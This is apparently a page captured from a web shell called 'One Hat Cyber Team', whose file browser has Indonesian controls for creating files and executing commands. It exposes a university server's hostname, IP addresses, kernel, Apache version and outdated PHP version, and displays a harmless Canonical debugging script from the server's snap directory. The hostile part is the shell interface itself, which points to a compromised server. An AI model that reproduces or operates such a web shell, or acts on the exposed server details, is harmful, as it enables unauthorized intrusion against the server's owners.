One Hat Cyber Team
Your IP :
216.73.216.115
Server IP :
194.44.31.54
Server :
Linux zen.imath.kiev.ua 4.18.0-553.77.1.el8_10.x86_64 #1 SMP Fri Oct 3 14:30:23 UTC 2025 x86_64
Server Software :
Apache/2.4.37 (Rocky Linux) OpenSSL/1.1.1k
PHP Version :
5.6.40
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
snap
/
core
/
17272
/
usr
/
bin
/
View File Name :
sc-logresolve
#!/bin/sh # Author: Jamie Strandboge <jamie@ubuntu.com> # Copyright (C) 2015 Canonical Ltd. # # This script is distributed under the terms and conditions of the GNU General # Public License, Version 3 or later. See http://www.gnu.org/copyleft/gpl.html # for details. set -e cat <<EOM This script has been replaced by snappy-debug. Please use: $ sudo snappy install snappy-debug $ sudo snappy-debug.security scanlog Alternatively, you can use 'scmp_sys_resolver' to resolve syscall numbers. Eg: $ scmp_sys_resolver 108 getegid You must use scmp_sys_resolver on the same architecture as the device where the seccomp denial was logged. EOM logfile="/var/log/syslog" usage() { cat <<EOM Usage: `basename $0` <logfile> If <logfile> is unspecified, use '$logfile'. If <logfile> is '-', use <stdin>. EOM }